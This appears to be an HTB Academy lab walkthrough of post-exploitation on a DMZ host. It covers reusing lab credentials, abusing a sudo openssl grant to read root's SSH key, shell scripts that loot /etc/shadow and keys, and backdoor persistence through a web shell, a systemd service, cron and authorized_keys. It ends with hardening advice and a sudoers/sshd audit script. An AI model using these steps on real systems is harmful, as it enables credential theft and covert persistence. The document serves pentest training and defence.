
Post-Exploitation Persistence

🎯 Overview

Post-exploitation persistence ensures stable access after hard-fought initial compromise. Transform unstable reverse shells into persistent SSH access, escalate to root privileges, and establish reliable pivot points for internal Active Directory attacks.

🔒 Establishing Stable Access

🔑 SSH Connection Upgrade

# Leverage discovered credentials for stable access
ssh srvadm@TARGET_IP
Password: ILFreightnixadm!

# Why SSH beats a reverse shell here:
- Survives independently of the exploited process (a reverse shell dies with whatever spawned it)
- Can be re-established every day without replaying the exploitation chain
- Native tunnelling (-L / -R / -D) for pivoting into the internal network
- Full TTY, scp/sftp file transfer, and a cleaner record of what was run for the report
- Acts as a backup path if the original foothold is patched or restarted

📊 System Information Gathering

# Interface summary from the Ubuntu login banner (MOTD); `ip -br -4 addr` shows the same data on demand
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-113-generic x86_64)

System information as of [DATE]:
IPv4 address for br-65c448355ed2: 172.18.0.1    # Docker user-defined bridge
IPv4 address for docker0:         172.17.0.1    # Docker default bridge
IPv4 address for ens160:          10.129.203.111 # External-facing interface (the side we attacked from)
IPv4 address for ens192:          172.16.8.120   # Internal AD network

# Key observations:
- dmz01 is dual-homed: ens160 faces the network we came in from, ens192 faces the internal range
- The 172.17/16 and 172.18/16 addresses are local container bridges, not routes into the client network
- Containers are likely hosting the web applications; check `docker ps` once root
- 172.16.8.0/23 is the in-scope internal network and ens192 is the pivot interface
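The interface triage above is easy to get wrong on a box with several Docker bridges, so here is an added helper (not part of the HTB module or the original notes) that classifies `ip -br -4 addr show` output into ingress, pivot and container interfaces and derives each subnet in CIDR form. The sample lines are constructed to mirror the MOTD above; the /16 on ens160 is an assumption because the MOTD does not print prefix lengths.

```shell
#!/bin/sh
# Added example (not from the HTB module): classify `ip -br -4 addr show`
# output into ingress / pivot / container interfaces and derive each subnet.
# SAMPLE_ADDR is constructed to mirror the MOTD above; the /16 on ens160 is
# an assumption because the MOTD does not print prefix lengths.

# cidr_network <a.b.c.d/prefix>: print the network address in CIDR form.
cidr_network() {
  ip=${1%/*}; prefix=${1#*/}
  [ "$prefix" = "$1" ] && prefix=32            # no "/n" given: treat as host route
  oldifs=$IFS; IFS=.; set -- $ip; IFS=$oldifs  # split into four octets
  addr=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
  if [ "$prefix" -eq 0 ]; then
    mask=0
  else
    mask=$(( (4294967295 << (32 - prefix)) & 4294967295 ))
  fi
  net=$(( addr & mask ))
  printf '%d.%d.%d.%d/%d\n' \
    $(( (net >> 24) & 255 )) $(( (net >> 16) & 255 )) \
    $(( (net >> 8) & 255 ))  $(( net & 255 )) "$prefix"
}

# classify_ifaces <default_route_iface>: read `ip -br -4 addr show` on stdin
# and print "<role> <iface> <network>". The default-route interface is the
# way we came in; anything else that is not a container bridge is a pivot.
# Get the default-route interface with:  ip route show default | awk '{print $5}'
classify_ifaces() {
  ingress=$1
  while read -r iface state cidr _rest; do
    case "$iface" in
      lo)                 continue ;;
      docker*|br-*|veth*) role=container ;;   # local container networks, not client routes
      "$ingress")         role=ingress ;;
      *)                  role=pivot ;;
    esac
    printf '%s %s %s\n' "$role" "$iface" "$(cidr_network "$cidr")"
  done
}

# Constructed sample (mirrors the MOTD shown above; not captured from the host).
SAMPLE_ADDR='lo               UNKNOWN        127.0.0.1/8
ens160           UP             10.129.203.111/16
ens192           UP             172.16.8.120/23
docker0          DOWN           172.17.0.1/16
br-65c448355ed2  UP             172.18.0.1/16'

# Stand-alone run: print the classification, then just the subnet(s) to hand
# to the next phase's internal scan.
if [ "${1:-}" = "demo" ]; then
  printf '%s\n' "$SAMPLE_ADDR" | classify_ifaces ens160
  printf '%s\n' "$SAMPLE_ADDR" | classify_ifaces ens160 | awk '$1 == "pivot" { print $3 }'
fi
```

On the real host, pipe `ip -br -4 addr show` into `classify_ifaces "$(ip route show default | awk '{print $5}')"`; the `pivot` lines are the networks to scan next, and `ip route get 172.16.8.1` confirms the kernel actually sends that traffic out of ens192.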

🔺 Local Privilege Escalation

🔍 Privilege Assessment

# Standard privilege escalation checks
id
# Output: uid=1003(srvadm) gid=1003(srvadm) groups=1003(srvadm)

# Sudo privileges enumeration
sudo -l

# Result:
User srvadm may run the following commands on dmz01:
    (ALL) NOPASSWD: /usr/bin/openssl

🛠️ OpenSSL GTFOBin Exploitation

# GTFOBins reference: https://gtfobins.github.io/gtfobins/openssl/
# With no cipher given, `openssl enc` simply copies -in to stdout, so a NOPASSWD
# sudo grant on openssl is an arbitrary file read as root: any file root can
# read (/etc/shadow, other users' keys, application secrets) is fair game.

# Target: root's SSH private key
LFILE=/root/.ssh/id_rsa
sudo /usr/bin/openssl enc -in "$LFILE"

# Expected output:
-----BEGIN OPENSSH PRIVATE KEY-----
[BASE64_ENCODED_PRIVATE_KEY]
-----END OPENSSH PRIVATE KEY-----
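The `sudo -l` enumeration and the openssl file read above are two halves of one routine, so here is an added script (not from the HTB module or the original notes) that parses `sudo -l` output for NOPASSWD commands, matches them against a hand-picked subset of GTFOBins file-read binaries, and wraps the openssl primitive so several high-value files can be pulled in one go. The sample `sudo -l` text is constructed from the dmz01 output shown above; the binary list and the loot paths are my assumptions, not the module's.

```shell
#!/bin/sh
# Added example (not from the HTB module): triage `sudo -l` output against a
# short GTFOBins-derived list and loot files through the openssl read primitive.
# SAMPLE_SUDO_L is constructed from the dmz01 output shown on this page.

# Hand-picked subset of GTFOBins entries whose sudo grant gives at least a
# privileged file read (assumption: extend for your own engagement).
GTFO_FILE_READ="openssl cat less more vim vi nano tail head base64 xxd od python python3 perl"

# nopasswd_bins: read `sudo -l` output on stdin, print one NOPASSWD command
# path per line (handles "(user) NOPASSWD: a, b" lists and argument specs).
nopasswd_bins() {
  awk '
    /NOPASSWD:/ {
      sub(/.*NOPASSWD:[ \t]*/, "")              # drop "(ALL) NOPASSWD: "
      n = split($0, cmds, /,[ \t]*/)            # comma-separated command list
      for (i = 1; i <= n; i++) {
        split(cmds[i], parts, /[ \t]+/)         # strip any fixed argument spec
        if (parts[1] != "") print parts[1]
      }
    }'
}

# gtfo_candidates: keep only paths whose basename is in GTFO_FILE_READ.
gtfo_candidates() {
  while read -r path; do
    base=${path##*/}
    case " $GTFO_FILE_READ " in
      *" $base "*) printf '%s\n' "$path" ;;
    esac
  done
}

# priv_read <file>: copy a root-readable file to stdout via the openssl grant.
# `openssl enc` with no cipher is a passthrough, so the output is byte-exact.
priv_read() {
  sudo /usr/bin/openssl enc -in "$1"
}

# loot <outdir>: pull a fixed set of high-value files (assumed list) into a
# local directory, one file per path, reporting anything unreadable.
loot() {
  outdir=$1
  mkdir -p "$outdir" && chmod 700 "$outdir"
  for f in /root/.ssh/id_rsa /root/.ssh/authorized_keys /etc/shadow /root/.bash_history; do
    priv_read "$f" > "$outdir/$(printf '%s' "$f" | tr / _)" 2>/dev/null \
      || echo "[-] $f unreadable" >&2
  done
}

# Constructed sample: the `sudo -l` result shown on this page.
SAMPLE_SUDO_L='Matching Defaults entries for srvadm on dmz01:
    env_reset, mail_badpass

User srvadm may run the following commands on dmz01:
    (ALL) NOPASSWD: /usr/bin/openssl'

# Stand-alone run: show which NOPASSWD binaries are worth a GTFOBins lookup.
if [ "${1:-}" = "demo" ]; then
  printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_bins | gtfo_candidates
fi
```

On the target, `sudo -l | nopasswd_bins | gtfo_candidates` lists what to look up, and `loot ./dmz01_loot` (run on the target, then copied back over the SSH session) saves the files; check the saved key with `ssh-keygen -y -f dmz01_loot/_root_.ssh_id_rsa` before trying it, since a key that does not parse cleanly usually means the copy picked up a prompt or a trailing shell artifact.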

🔐 SSH Key Persistence Setup

# 1. Save extracted private key locally
cat > dmz01_root_key << 'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
[EXTRACTED_PRIVATE_KEY_CONTENT]
-----END OPENSSH PRIVATE KEY-----
EOF

# 2. Set proper permissions
chmod 600 dmz01_root_key

# 3. Test root SSH access. This works because Ubuntu's sshd default is
#    PermitRootLogin prohibit-password: root may log in with a key, never a password.
ssh -i dmz01_root_key root@TARGET_IP

# 4. Verify root privileges
root@dmz01:~# id
uid=0(root) gid=0(root) groups=0(root)

🎯 Persistence Benefits Analysis

🚀 Access Advantages

# Stable SSH access provides:
- Immediate access each day without repeating the exploitation chain
- Reliable tunnelling (ssh -L / -R / -D) into 172.16.8.0/23
- A second, independent path in case the original foothold breaks
- A cleaner record of commands run for the report

# Root privileges enable:
- Reading any file on the host (shadow, keys, application configs, Docker secrets)
- Further persistence (authorized_keys, services, cron) if the engagement needs it
- Network configuration changes (routes, iptables, proxy tooling)
- Internal reconnaissance from the DMZ position
- Deploying pivot tooling (SOCKS proxies, port forwards)

🔄 Alternative Persistence Methods

# SSH key deployment (if root has no existing key to steal):
# generate the pair on the ATTACKING host, then append only the public half on the target
ssh-keygen -t rsa -b 4096 -f dmz01_root_key                 # attacker
mkdir -p /root/.ssh && chmod 700 /root/.ssh                 # target (as root)
echo "<contents of dmz01_root_key.pub>" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys                        # sshd rejects group/world-writable files

# Backdoor web shell placement (noisy: lands in the web root, caught by FIM and AV):
cp webshell.php /var/www/html/.hidden/
chown www-data:www-data /var/www/html/.hidden/webshell.php

# Service manipulation (needs a unit file under /etc/systemd/system first; visible in systemctl output):
systemctl enable custom-backdoor.service
systemctl start custom-backdoor.service

# Scheduled task persistence (/etc/crontab takes a user field; /tmp may be mounted noexec, so prefer another path):
echo "* * * * * root /tmp/.backdoor" >> /etc/crontab

# The web shell, service and cron options are high-visibility: use them only when the
# engagement calls for it, record them, and remove them at the end.
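Appending to authorized_keys by hand is where permissions get wrong or a key lands twice, so here is an added helper (not from the HTB module or the original notes) that installs a tagged authorized_keys entry idempotently with sshd-acceptable modes and removes exactly that entry again at the end of the engagement. The tag and the sample key are assumptions; the functions take the `.ssh` directory as an argument so they can be rehearsed against a scratch directory before touching `/root/.ssh`.

```shell
#!/bin/sh
# Added example (not from the HTB module): install an authorized_keys entry
# idempotently with sshd-acceptable permissions, and remove it again at the
# end of the engagement. TAG and the sample key are assumptions.

TAG="pentest-dmz01"   # key comment used to find and remove our entry (assumed value)

# install_key <ssh_dir> "<type> <base64>": add the key once, with 700/600 modes.
install_key() {
  ssh_dir=$1; pubkey=$2
  auth=$ssh_dir/authorized_keys
  umask 077                         # anything we create is owner-only from the start
  mkdir -p "$ssh_dir" && chmod 700 "$ssh_dir"
  [ -f "$auth" ] || : > "$auth"
  chmod 600 "$auth"                 # sshd (StrictModes) ignores group/world-writable files
  blob=$(printf '%s\n' "$pubkey" | awk '{print $2}')
  if grep -qF -- "$blob" "$auth"; then
    return 0                        # already installed: do not duplicate the line
  fi
  printf '%s %s\n' "$pubkey" "$TAG" >> "$auth"
}

# remove_key <ssh_dir>: drop only lines carrying our tag, keeping the client's keys.
remove_key() {
  auth=$1/authorized_keys
  [ -f "$auth" ] || return 0
  tmp=$(mktemp)
  grep -vF -- " $TAG" "$auth" > "$tmp" || true   # grep exits 1 when nothing is left
  cat "$tmp" > "$auth"              # rewrite in place so owner and mode stay unchanged
  rm -f "$tmp"
}

# key_count <ssh_dir>: how many of our tagged entries are present (0 if none).
key_count() {
  [ -f "$1/authorized_keys" ] || { echo 0; return 0; }
  grep -cF -- " $TAG" "$1/authorized_keys" || true
}

# Stand-alone rehearsal against a scratch directory (never /root/.ssh).
if [ "${1:-}" = "demo" ]; then
  d=$(mktemp -d)
  install_key "$d/.ssh" "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedDemoKeyNotReal0000000000"
  echo "tagged entries: $(key_count "$d/.ssh")"
  remove_key "$d/.ssh"
  echo "after cleanup:  $(key_count "$d/.ssh")"
  rm -rf "$d"
fi
```

Rehearse with `sh script.sh demo`, then on dmz01 run `install_key /root/.ssh "ssh-ed25519 AAAA..."` as root; at the end of the test `remove_key /root/.ssh` leaves every pre-existing key untouched, and `key_count` is the check to put in the cleanup log. Before relying on a key you extracted rather than generated, `ssh-keygen -y -f dmz01_root_key` on the attacking host confirms it parses.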

🌐 Network Position Assessment

📊 DMZ Host Analysis

# Network topology understanding:
External Network (10.129.x.x) → DMZ (dmz01) → Internal Network (172.16.8.0/23)

# Host role identification:
- Web services hosting (monitoring, dev applications)
- Network boundary device
- Dual-homed system (external + internal)
- Pivot point into corporate environment

# Service enumeration:
ps aux | grep -v "]"          # Running processes, crudely hiding kernel threads ([kthreadd] etc.)
netstat -antup                # Listening sockets and connections (needs net-tools, not installed by default on Ubuntu 20.04)
ss -antup                     # iproute2 equivalent of the above, always present
systemctl list-units --type=service  # System services

🎯 Internal Network Preparation

# Network discovery preparation:
ip route                      # Routing table: confirm 172.16.8.0/23 is reachable via ens192
ip neigh                      # Neighbour (ARP) table: hosts dmz01 has already talked to (arp -a needs net-tools)
cat /etc/resolv.conf          # DNS configuration: often reveals the internal domain and DC addresses
cat /etc/hosts                # Static host entries

# Pivot planning:
- SSH tunneling capabilities
- Port forwarding setup
- SOCKS proxy configuration
- Internal reconnaissance staging

🛡️ Operational Security

🔒 Access Maintenance

# Best practices:
- Save private keys securely (encrypted storage)
- Document access credentials
- Test backup access methods
- Monitor for account changes
- Plan for credential rotation

# Risk mitigation (this is an authorized test, not an intrusion):
- Use the least intrusive persistence that meets the engagement's needs; a stolen or added SSH key is far quieter than services, cron jobs or web shells
- Avoid high-visibility modifications (web root, systemd units, /etc/crontab) unless agreed with the client
- Clean up temporary files and remove every persistence mechanism at the end of the test
- Document all system changes (what, where, when) so the client can verify removal

📋 Pivot Preparation Checklist

# Pre-pivot requirements:
✅ Stable SSH access established
✅ Root privileges confirmed
✅ Network interfaces mapped
✅ Internal network connectivity verified
✅ Backup access methods deployed

# Next phase preparation:
- Internal network scanning
- Active Directory enumeration
- Domain controller identification
- Service account discovery
- Lateral movement planning

🎯 HTB Academy Lab

📋 Lab Solution Summary

# Persistence establishment chain:
1. SSH connection → srvadm:ILFreightnixadm!
2. Sudo enumeration → /usr/bin/openssl NOPASSWD
3. GTFOBin exploitation → privileged file read
4. SSH key extraction → /root/.ssh/id_rsa
5. Root access establishment → stable persistence
6. Flag retrieval → /root/flag.txt

# Key techniques demonstrated:
- Credential reuse for stable access
- GTFOBins privilege escalation
- SSH key-based persistence
- Professional access maintenance

🔍 Learning Objectives

# Technical skills:
- GTFOBins exploitation techniques
- SSH key-based persistence methods
- Privilege escalation validation
- Network position assessment

# Professional methodology:
- Stable access prioritization
- Backup access planning
- Documentation standards
- Operational security practices

# Real-world application:
- DMZ compromise scenarios
- Persistence in enterprise environments
- Internal network pivot preparation
- Long-term access maintenance

🛡️ Defensive Recommendations

🔒 System Hardening

# Sudo configuration:
- Remove unnecessary NOPASSWD entries; "(ALL) NOPASSWD: /usr/bin/openssl" is a root file read (GTFOBins), not a harmless convenience
- Implement least privilege: grant specific commands with fixed arguments, never general-purpose binaries
- Regular sudo access audits (visudo -c, review of /etc/sudoers.d/)
- Command logging and monitoring (Defaults log_input, log_output; forward auth.log)

# SSH security:
- Disable root SSH login (PermitRootLogin no) and administer through sudo instead
- Implement key-based authentication only (PasswordAuthentication no); the srvadm password reuse would then have gone nowhere
- Prefer short-lived SSH certificates (ssh-keygen -s with a CA) over long-lived static keys, so a stolen id_rsa expires
- Monitor SSH access logs for new source addresses and for changes to authorized_keys

# File system protection:
- Restrict access to sensitive files (/root/.ssh 700, private keys 600 and passphrase-protected)
- Implement file integrity monitoring on authorized_keys, /etc/crontab, systemd units and web roots
- Regular permission audits
- Secure backup storage
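The sudo and SSH recommendations above are checkable, so here is an added audit script (not from the HTB module or the original notes) that flags every NOPASSWD grant in sudoers files and the two sshd_config settings that made root access trivial here. File paths are arguments so the checks run against constructed copies; on a live host pass `/etc/sudoers`, `/etc/sudoers.d/*` (root-readable only) and `/etc/ssh/sshd_config`. The sshd check reads only the global, first-wins value of each directive; settings inside `Match` blocks are an assumption it does not cover.

```shell
#!/bin/sh
# Added example (not from the HTB module): audit sudoers files and sshd_config
# for the weaknesses exploited on this page. Paths are arguments so the checks
# can run against constructed copies before being pointed at /etc.

# audit_sudoers <file>...: print "NOPASSWD <user_or_group> <commands>" for
# every passwordless grant, skipping comments and blank lines.
audit_sudoers() {
  cat "$@" | awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }           # comments and blanks
    /NOPASSWD:/ {
      who = $1                                  # user, %group or User_Alias
      cmds = $0
      sub(/.*NOPASSWD:[ \t]*/, "", cmds)        # keep only the command list
      print "NOPASSWD " who " " cmds
    }'
}

# sshd_setting <file> <directive> <default>: sshd uses the FIRST uncommented
# value of a directive, so stop at the first match; fall back to the default.
sshd_setting() {
  val=$(awk -v k="$2" 'tolower($1) == tolower(k) { print $2; exit }' "$1")
  printf '%s\n' "${val:-$3}"
}

# audit_sshd <file>: one FINDING line per weak setting, nothing if hardened.
# Defaults are the upstream OpenSSH ones (Ubuntu ships them commented out).
audit_sshd() {
  prl=$(sshd_setting "$1" PermitRootLogin prohibit-password)
  pa=$(sshd_setting "$1" PasswordAuthentication yes)
  [ "$prl" = no ] || echo "FINDING PermitRootLogin=$prl: set PermitRootLogin no"
  [ "$pa" = no ]  || echo "FINDING PasswordAuthentication=$pa: set PasswordAuthentication no (keys or certificates only)"
}

# Stand-alone run against the real configuration (requires root for sudoers).
if [ "${1:-}" = "live" ]; then
  audit_sudoers /etc/sudoers /etc/sudoers.d/*
  audit_sshd /etc/ssh/sshd_config
fi
```

Run as root with `sh audit.sh live`; on dmz01 as described above it would report the `srvadm` openssl grant plus both sshd findings, and an empty result is the state to aim for after remediation.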